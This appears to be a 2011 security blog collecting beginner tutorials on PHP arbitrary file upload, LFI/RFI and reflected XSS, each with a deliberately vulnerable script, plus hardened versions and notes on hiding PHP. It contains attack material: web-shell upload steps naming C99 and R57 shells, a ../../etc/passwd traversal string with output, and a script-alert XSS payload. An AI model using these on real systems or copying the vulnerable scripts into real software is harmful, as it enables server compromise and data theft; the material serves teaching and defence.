Monday, December 19, 2011

Basics of Arbitrary File Upload

As the name suggests, an arbitrary file upload vulnerability occurs in a web application when the type, extension and name of an uploaded file are not checked, filtered or sanitised before the file is stored somewhere the web server will serve it.

The main danger of this kind of vulnerability is that the attacker can upload a malicious PHP, ASP or similar script and then execute it by requesting it over HTTP. The goal is to run code of the attacker's choosing on the server. For example, an attacker who finds such a bug can upload a web shell and use it to run arbitrary commands, which leads to a full compromise of the server.

In this tutorial we'll look at a basic example of a vulnerable script and how to exploit it. So let's get started.

Proof of Concept



For the demonstration of a realistic scenario, I have created a basic vulnerable PHP script.

Upload.php
Code:
<?php

  /**
   * @author lionaneesh
   * @copyright 2011
   * @page upload.php
   */

  // If an upload request has been made, move the file into the script's own
  // directory under the name the client supplied. Nothing about the file
  // (name, extension, MIME type, size) is checked: that is the bug.

  $uploadMessage = "";

  if (isset($_POST['upload']))
  {
        $path = $_FILES['uploadFile']['name'];
        if(move_uploaded_file($_FILES['uploadFile']['tmp_name'],$path) == TRUE)
        {
              $uploadMessage = "File Uploaded <a href='$path'>HERE</a>";
        }
  }

  ?>

  <html>

  <head>

      <title>Welcome to Vulnerable Apps</title>

  </head>

  <body>

  <h1>Arbitrary file upload ( POC )</h1>
  <hr />

  <p>Hey all, this is a sample PHP script to upload image files. This script doesn't contain any file type checking code, which makes it prone to an arbitrary file upload vulnerability.</p>

  <hr />
  <h2>Upload</h2>
  <hr />

  <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST" enctype="multipart/form-data">
  <table>
      <tr>

          <td width="100">Upload File </td>
          <td width="380"><input class="cmd" type="file" name="uploadFile"/></td>
          <td><input style="margin-left:20px;" type="submit" name="upload" class="own" value="Upload"/></td>

      </tr>
  </table>
  </form>
  <?php

  echo $uploadMessage;

  ?>

  </body>

  </html>
In the above script we simply ask the user for a file and, without checking its type or even its extension, move it into the web root under whatever name the client supplied. The script then prints a link to it, so the uploaded file is immediately reachable by URL and, if its name ends in .php, the server will execute it on the first request.

This is a basic example of how these bugs occur.

How to exploit it



Exploiting this common bug is even simpler: the attacker downloads any web shell written in PHP, ASP etc. (a web shell is just a script that takes a command from a request parameter, passes it to something like system() and returns the output).

Some PHP shells:

Ani-Shell
R57 Shell
C99 Shell

Note: These shells are not intended to be used in this way; the author is not responsible for the way in which the user uses them.

To exploit this vulnerability the attacker carries out three steps:

1. Upload the shell: select shell.php (or whatever the shell is called) in the form and submit it. Since nothing is checked, move_uploaded_file() writes it next to upload.php.

2. Go to the link: the script prints a link to the uploaded path. Because the file has a .php extension, the server runs it as PHP instead of serving it as a download.

3. Gain access: the shell now runs with the privileges of the web server user, so the attacker can list files, read configuration (database passwords and so on) and run commands.
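The missing checks, as an added example that is not part of the original tutorial: a hardened version of upload.php. It assumes the form is meant for images, PHP 7 or later with the fileinfo extension, and an upload directory /var/www/uploads (a name chosen for this example) that the web server can write to but is configured not to execute PHP from.

```php
<?php
/**
 * Hardened counterpart of upload.php (added example, not the original page's code).
 * Assumptions: uploads are images; PHP >= 7 with the fileinfo extension;
 * UPLOAD_DIR exists, is writable by the web server and is never executed as PHP.
 */

define('UPLOAD_DIR', '/var/www/uploads');   // assumed location; not the script directory
define('MAX_BYTES', 2 * 1024 * 1024);        // 2 MiB, an assumed policy

// Allowed content types (detected from the bytes) mapped to the extension WE assign.
$allowedTypes = array(
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
);

// Returns array(true, stored name) or array(false, reason).
function handle_upload(array $file, array $allowedTypes)
{
    // 1. Anything PHP itself flagged (size limits, partial upload, no file) is rejected.
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return array(false, 'upload failed');
    }
    // 2. Only act on files that really arrived via this HTTP request.
    if (!is_uploaded_file($file['tmp_name'])) {
        return array(false, 'not an uploaded file');
    }
    // 3. Enforce our own size limit, independent of php.ini.
    if ($file['size'] > MAX_BYTES) {
        return array(false, 'file too large');
    }
    // 4. Decide the type from the content, never from the client's name or $file['type'].
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset($allowedTypes[$mime])) {
        return array(false, 'file type not allowed');
    }
    // 5. Throw the client's filename away. A random name plus an extension we
    //    choose means shell.php, shell.php.jpg or shell.phtml can never land on disk.
    $name = bin2hex(random_bytes(16)) . '.' . $allowedTypes[$mime];
    $dest = UPLOAD_DIR . DIRECTORY_SEPARATOR . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return array(false, 'could not store file');
    }
    chmod($dest, 0644);   // readable, never executable
    return array(true, $name);
}

$uploadMessage = '';
if (isset($_POST['upload']) && isset($_FILES['uploadFile'])) {
    list($ok, $info) = handle_upload($_FILES['uploadFile'], $allowedTypes);
    // Everything echoed back is HTML-encoded (see the XSS section later on this page).
    $uploadMessage = ($ok ? 'File stored as ' : 'Rejected: ')
                   . htmlspecialchars($info, ENT_QUOTES, 'UTF-8');
}
?>
<html>
<head><title>Upload (hardened)</title></head>
<body>
<form action="upload.php" method="POST" enctype="multipart/form-data">
    <input type="file" name="uploadFile" />
    <input type="submit" name="upload" value="Upload" />
</form>
<?php echo $uploadMessage; ?>
</body>
</html>
```

Two things sit outside the script. First, the upload directory must not execute PHP: with mod_php, a .htaccess file in /var/www/uploads containing php_flag engine off (or a Directory block with the same directive in the main configuration) switches the interpreter off there; with php-fpm the equivalent is to leave the PHP handler unmapped for that location. Second, the finfo check only decides that the bytes look like an image; it does not stop an image that also carries PHP code, which is exactly why the random name and the non-executing directory are needed as well.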



That's it for this tutorial; stay tuned for more.


Basics of LFI and RFI Attacks



Local File Inclusion (LFI) is a technique for making a server include one of its own files through a specially crafted HTTP request. It can be exploited with nothing more than a web browser, so it is very easy to exploit. The vulnerability occurs when unsanitised user-supplied data is passed to an inclusion function (include(), require() etc.). These attacks are usually combined with directory traversal (../ sequences), which lets the attacker reach files outside the web root and disclose sensitive data, leading to further attacks.

Now that’s quite a bit of theory there let’s have a look on a sample vulnerable application.

Demonstration [Proof of Concept]



I have created a pair of files named index.html and lfi.php
lfi.php
Code:
<html>
  <head>
    <title>Vulnerable to LFI -- by lionaneesh</title>
  </head>
  <body>

    <h1>Welcome to this Website</h1>

    <?php $page = isset($_GET['page']) ? $_GET['page'] : 'index.html'; ?>

    <p>You are currently at <?php echo "<a href='$page'>$page</a>"; ?></p>

    <?php include($page); // user input passed straight to include(): the bug ?>
  </body>
</html>
As you can see, the code above does include(USER_INPUT). We can therefore supply any filename and the file will be pulled into the page: PHP code inside it is executed and anything else is printed as-is. This is the most common form in which these bugs occur.
index.html
Code:
<p>Hello I am a sample page my name is index.html</p>
Providing normal Input:-
First let’s try and give this app a normal input which it would be expecting.

Input: index.html
Output:-
Code:
Welcome to this Website

  You are currently at index.html
  Hello I am a sample page my name is index.html
It works fine! Now let’s construct the attack string and see what happens!


Constructing the attack string


As I am working on UNIX, we'll print the contents of /etc/passwd, the local source of information about user accounts (it lists every account with its UID, home directory and shell; the password hashes themselves live in /etc/shadow, which the web server user normally cannot read).

My present working directory is /var/www/, so what I have to do is:
  1. Go back two directories, to /, and
  2. Then go to etc/passwd
We can go back two directories using '../../'

Attack string :-

Code:
../../etc/passwd
Now lets feed this as an input and see what happens.

Input: ../../etc/passwd

Code:
Welcome to this Website

You are currently at ../../etc/passwd
root:x:0:1:Super-User:/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/
And voila! We just printed the /etc/passwd file.

Remote File Inclusion



RFI is an abbreviation for Remote File Inclusion and is quite similar to LFI: it is a method of including remote files (hosted on another server) through a specially crafted HTTP request, and it can also be exploited from a web browser. The vulnerability occurs in exactly the same way, when unsanitised user-supplied data is passed to an inclusion function (include(), require() etc.), with the difference that PHP fetches the file over HTTP (or FTP) and executes any PHP code it contains. In a real attack the remote file is a web shell hosted by the attacker, which gives the same result as the arbitrary file upload above without needing an upload form.

Demonstration [Proof of Concept]



We’ll be using the same sample web-app we used to Demonstrate LFI

Constructing the attack string:-

In our case we want to include go4expert's index page in our local page.

So all we have to do is supply the URL as the input and see what happens.

Input : http://go4expert.com

Output (page source):-
Code:
<html>
<head>
                       <title>Vulnerable to LFI -- by lionaneesh</title>
 </head>

 <body>

 <h1>Welcome to this Website</h1>

  <p>You are currently at <a href='http://go4expert.com'>http://go4expert.com</a>

</p> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head>         <meta http-equiv="Cache-Control" content="no-cache" />        <meta http-equiv="Pragma" content="no-cache" />
        <meta http-equiv="Expires" content="0" />  
<title>Programming and SEO Forums </title> 

<!-- ChartBeat -->

<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>

<!-- /ChartBeat --> 

 --------Sniped-----------


Note: In most modern php.ini files allow_url_include is Off (it has defaulted to Off since it was introduced in PHP 5.2), so include() and require() refuse URLs and this attack fails with a warning. The older allow_url_fopen setting only governs functions like file_get_contents() and does not protect include(). Turning allow_url_include off does nothing against LFI, and PHP's own php://filter wrapper (which is not subject to allow_url_include) can still be used in the same include() to read source code, so the real fix is never to pass user input to an inclusion function.
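Closing the hole shown in lfi.php, as an added example that is not part of the original tutorial (it covers both the LFI and the RFI demonstrations above): the page name from the request is used only as a key into an allowlist, and the resolved path is canonicalised and checked against the pages directory. Assumptions: page files live in /var/www/pages, a directory name chosen for this example, and every includable page is listed in $pages.

```php
<?php
/**
 * Hardened counterpart of lfi.php (added example, not the original page's code).
 * Two independent defences are shown; either alone closes the LFI/RFI hole,
 * together they are defence in depth.
 *
 * Assumptions: page files live in PAGES_DIR (a name chosen for this example)
 * and every includable page is listed in $pages.
 */

define('PAGES_DIR', '/var/www/pages');

// Defence 1: an allowlist. The request supplies a key, never a path, so
// ../../etc/passwd, http://attacker/shell.txt and php://filter/... are all
// simply unknown keys.
$pages = array(
    'home'    => 'index.html',
    'about'   => 'about.html',
    'contact' => 'contact.php',
);

// Defence 2: canonicalise the resolved path and confirm it stays inside the
// pages directory. This is the general check to use when a file name must come
// from the client (download scripts, templates chosen by name): realpath()
// collapses ../ sequences and returns false for anything that is not a real
// local file, which excludes every stream wrapper (http://, php://, ...).
function resolve_page($key, array $pages, $base)
{
    if (!isset($pages[$key])) {
        return null;                                   // unknown key: refuse
    }
    $baseReal = realpath($base);
    $fileReal = realpath($base . DIRECTORY_SEPARATOR . $pages[$key]);
    if ($baseReal === false || $fileReal === false) {
        return null;                                   // directory or file missing
    }
    // Prefix match on the canonical path, with the separator appended so that
    // /var/www/pages2/x does not count as inside /var/www/pages.
    if (strpos($fileReal, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $fileReal;
}

$key  = isset($_GET['page']) ? $_GET['page'] : 'home';
$file = resolve_page($key, $pages, PAGES_DIR);
?>
<html>
  <head>
    <title>Not vulnerable to LFI</title>
  </head>
  <body>
    <h1>Welcome to this Website</h1>

    <!-- the key is HTML-encoded before it is echoed; lfi.php also had a
         reflected XSS here because $page went into the <a> tag unencoded -->
    <p>You are currently at <?php echo htmlspecialchars($key, ENT_QUOTES, 'UTF-8'); ?></p>

<?php
if ($file === null) {
    echo '<p>Unknown page.</p>';
} else {
    include $file;
}
?>
  </body>
</html>
```

Two php.ini settings back this up at the platform level: allow_url_include = Off (the default) and open_basedir = /var/www, which makes PHP refuse to open any file outside that tree no matter what the script does.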

Basics of XSS, How the Logic Works



Cross Site Scripting, also known as XSS, is a common type of client-side attack on web applications. It allows an attacker to inject client-side script of their choosing into web pages viewed by other users; the script then runs in the victim's browser, inside the victim's session with the site.

Types of XSS



This attack is mainly of two types.

Non-Persistent (reflected)

This type of attack is carried out by injecting client-side code into a parameter of a vulnerable URL, which the application echoes back into the page. The attacker then spreads the URL to victims by social engineering (mail, forum posts and so on); when a victim clicks the link, the injected code executes in their browser, which can result in cookie theft, disclosure of private data and similar.

Persistent (stored)

This type of attack is more dangerous. It occurs when the data supplied by the attacker is stored by the server (a comment, a profile field, a forum post) and later served inside a normal page to every user who views it. No link needs to be sent: the attacker stores the malicious client-side code once and it runs for everyone, which can result in defacement of the website, cookie stealing, disclosure of private data and similar.

Demo



Now that we know what these vulnerabilities are and how they occur, let's actually look at a vulnerable script and how to test it!
Xss.php
Code: php
<html>
<head>
    <title>Vulnerable to XSS</title>
</head>
<body>
<h1>Welcome to XSS Demo Page</h1>
<p>The Data Entered is As Follows :- </p>
<?php
/**
 * @author lionaneesh
 * @copyright 2011
 */
if(isset($_GET['data'])) {
    $data = $_GET['data'];
} else {
    $data = "No Data Entered !";
}
echo "<i>$data</i>";   // user input written straight into the page: the bug
?>
</body>
</html>

Now Just Go to :-

Site.com/path/xss.php?data=<script>alert("XSS");</script>

And See what happens!

An alert box saying XSS appears, proving that your injected code was executed by the browser. This is just a small example of how these vulnerabilities occur in web applications and how you can test for them.

How to Fix Them



If your site is vulnerable to this type of attack, I recommend fixing it as soon as possible. For the scope of this tutorial I'll only cover how these vulnerabilities are fixed in PHP; if you are using another language, check its language reference or contact me.

PHP provides a function called htmlspecialchars(), which converts the characters that have a special meaning in HTML (&, <, >, " and, with ENT_QUOTES, ') into their HTML entities, so the browser displays them as text instead of interpreting them as markup. Escape only the untrusted value, not the surrounding markup: wrapping the whole "<i>$data</i>" string in htmlspecialchars() would also turn the italic tags into visible text. Pass the charset as well, so the function does not misparse bytes in the input. Now we'll use this in the above code and check what happens.
Xss.php (the echo line)
Code: php
echo "<i>" . htmlspecialchars($data, ENT_QUOTES, 'UTF-8') . "</i>";
Now let’s once more Go to :-

Site.com/path/xss.php?data=<script>alert("XSS");</script>

And See what happens!

No alert this time: the payload is shown on the page as literal text, because the browser received &lt;script&gt;alert(&quot;XSS&quot;);&lt;/script&gt; instead of a script tag.
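htmlspecialchars() is the right tool here because in xss.php the input lands in element content. The same value in a different context needs a different encoder, and a user-controlled URL (as in the lfi.php link earlier on this page, where $page went straight into href) cannot be made safe by encoding alone. The following is an added example, not part of the original tutorial; the helper names e_html, e_js, e_url_param and safe_href and the sample inputs are invented here.

```php
<?php
/**
 * Context-aware output encoding (added example, not the original page's code).
 * Each helper is named after the context it protects.
 */

// Element content and quoted attribute values: HTML entity encoding.
function e_html($s)
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// A value embedded in a <script> block: JSON encoding with the flags that also
// neutralise </script> and other HTML-significant characters.
function e_js($s)
{
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// A value used as a query-string parameter: percent-encoding.
function e_url_param($s)
{
    return rawurlencode($s);
}

// A user-supplied URL used as a whole href/src: encoding alone is not enough,
// because javascript:alert(1) is a perfectly well-formed attribute value.
// Allow only http(s) URLs that actually parse, and still entity-encode the result.
function safe_href($url)
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'])) {
        return '#';
    }
    $scheme = strtolower($parts['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') {
        return '#';
    }
    return e_html($url);
}

// Constructed sample inputs: the page's own payload and two that HTML
// encoding alone would not stop in their respective contexts.
$data = '<script>alert("XSS");</script>';
$page = 'javascript:alert(document.cookie)';
$js   = '</script><script>alert(1)</script>';
?>
<p>The Data Entered is As Follows :- <i><?php echo e_html($data); ?></i></p>
<p>You are currently at <a href="<?php echo safe_href($page); ?>"><?php echo e_html($page); ?></a></p>
<script>var entered = <?php echo e_js($js); ?>;</script>
<a href="search.php?q=<?php echo e_url_param($data); ?>">search again</a>
```

With these inputs the first paragraph shows the script tag as text, the link for $page points at "#" instead of running JavaScript when clicked, the JSON string inside the script block contains \u003C and \u003E rather than a literal closing script tag, and the query parameter is percent-encoded so it survives the round trip without being interpreted.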

That's all for this tutorial; stay tuned for more.


Thanks,

Greyhat

Obfuscating PHP


I must say that hiding or obfuscating is not the most effective security measure, but it is still useful for keeping a script kiddie confused about what you are actually running on your server.

As an example, a server may run a vulnerable version of PHP for which a public exploit has been released on some underground market. Most of the time a simple automated exploit follows, to help the point-and-click hackers (script kiddies). All they then have to do is find out which version of PHP you are running and, if it is vulnerable, point the exploit at it, launch it and own your system. In these cases not advertising the version can help a lot (the actual fix, of course, is to patch).

By hiding PHP you can stop, or at least slow down, an attacker targeting your machine.


In this tutorial, we’ll be looking at some of the most popular methods used by Site Administrators to Hide PHP , So let’s get started.

Editing php.ini file



By default PHP announces that it is installed, and which version, by adding an X-Powered-By: PHP/x.y.z header to every response the web server sends, which can be really lethal in some cases.

To turn this off, open the PHP configuration file php.ini. Its location depends on the installation: php --ini on the command line, or the "Loaded Configuration File" entry in phpinfo() output, tells you which file is in use.

In that file, go to the "Miscellaneous" section and set expose_php = Off, then restart the web server (or php-fpm) so the change takes effect.

Spoofing



By adding a single line of code you can actually fool an attacker about which language you are using.


Spoof.php

Code: php
<?php
error_reporting(0);
header("X-Powered-By: My Programming Language");
?>
Note: The header() call must be made before any output is sent to the client (including whitespace before the opening <?php tag), otherwise PHP can no longer change the headers and the real value goes out. header() replaces an existing header of the same name by default, so this normally overrides PHP's own X-Powered-By header even if expose_php is still on. It does nothing about Apache's Server header, which is controlled with the ServerTokens directive on the Apache side.

Using Some Basic Apache Rules



Most web servers, Apache included, can be configured to hand additional file extensions to PHP.


E.g.:


A file like index.php gives the attacker a straight clue that the server is running PHP. If we instead configure the server to parse an extension like .mpl as PHP, the file extension alone tells the attacker nothing.


For the Scope of this tutorial I’ll only be covering some Apache Rules/Configurations, but if you need help with some other servers, feel free to comment or PM me.


The configuration can be added either in a .htaccess file (which requires AllowOverride FileInfo for that directory) or directly in the Apache configuration file. Just add the following rule:


Syntax :-

Code:
AddType application/x-httpd-php .extension
Example :-
Code:
AddType application/x-httpd-php .mpl
Note: Only use an extension the server does not otherwise serve. Don't map .txt, for example, because every .txt file on the server would then be executed as PHP if it contained any. The same goes for .mp3, .asp or any other extension an upload feature might accept: every extension mapped here becomes one more way to turn the arbitrary file upload bug from the first tutorial into code execution, so upload filters must know about these mappings too. This AddType form applies to mod_php; with php-fpm the equivalent is a SetHandler rule for the chosen extension.

Conclusion



Obfuscation is not the most effective security measure and much of the time it does not help at all: a professional attacker already knows about these modifications and can easily work out what you are trying to hide (the default PHPSESSID session cookie name, PHP-style error messages and the behaviour of the application itself all give it away). But obfuscation does slow an attacker down and keeps some script kiddies away. It is better to obfuscate than to hand the attacker the information he wants, as long as it is done in addition to keeping PHP patched, not instead of it.